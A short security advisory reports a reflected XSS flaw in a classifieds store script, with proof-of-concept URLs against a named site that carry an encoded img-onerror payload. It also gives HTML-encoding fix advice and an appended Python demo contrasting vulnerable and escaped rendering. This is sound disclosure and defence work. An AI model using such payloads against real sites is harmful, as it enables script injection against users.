*Vendor:*
http://www.yourownclassifieds.com

*Description:*
Your own classified software is a script that helps you create your own
store.

*Discovered by: Rafay Baloch*

Vulnerability: Non-persistent XSS

The script fails to sanitize the input that is entered into the text box,
resulting in XSS.

*POC*:
http://www.gumtreeclone.com/cat-search/for-sales-2/XSS
http://www.gumtreeclone.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E

*Fix*:

- All input generated at any point inside the application should be HTML
encoded and filtered/sanitized before it is copied to the application
response.

- All HTML special characters should be replaced with their corresponding
HTML entities.

-- 
Warm Regards,
Rafay Baloch

http://rafayhackingarticles.net
http://techlotips.com
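
The fix described above, as an added example that is not part of the original advisory or the vendor's code: the last path segment of the PoC URL is rendered once as-is and once HTML-encoded, with a small regression check for unencoded reflection. The route prefix is taken from the PoC URLs; the page template and all function names are assumptions.

```python
import html
from urllib.parse import unquote, urlsplit

# Route shape taken from the PoC URLs: /cat-search/<category>/<term>
PREFIX = "/cat-search/"

# Second PoC URL from the advisory.
POC = ("http://www.gumtreeclone.com/cat-search/for-sales-2/"
       "%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E")


def search_term(url: str) -> str:
    """Return the percent-decoded term that follows the category segment."""
    path = urlsplit(url).path
    if not path.startswith(PREFIX):
        raise ValueError("not a cat-search URL")
    parts = path[len(PREFIX):].split("/", 1)
    return unquote(parts[1]) if len(parts) == 2 else ""


def render_vulnerable(term: str) -> str:
    # 'Before' (assumed template): the term is copied into an attribute
    # value and into the page body without any encoding.
    return f'<input name="q" value="{term}"><p>Results for {term}</p>'


def render_fixed(term: str) -> str:
    # 'After': & < > " ' are replaced with their HTML entities, which
    # covers both the quoted-attribute and the element-body context.
    safe = html.escape(term, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def has_unencoded_reflection(term: str, body: str) -> bool:
    """Regression check: a term containing HTML metacharacters must not
    appear verbatim in the response body."""
    return any(c in term for c in "<>\"'&") and term in body


if __name__ == "__main__":
    term = search_term(POC)
    for render in (render_vulnerable, render_fixed):
        body = render(term)
        print(render.__name__, has_unencoded_reflection(term, body))
        print(body)
```

Entity encoding is sufficient for these two contexts only; values placed inside script blocks, URLs or unquoted attributes need encoding specific to that context.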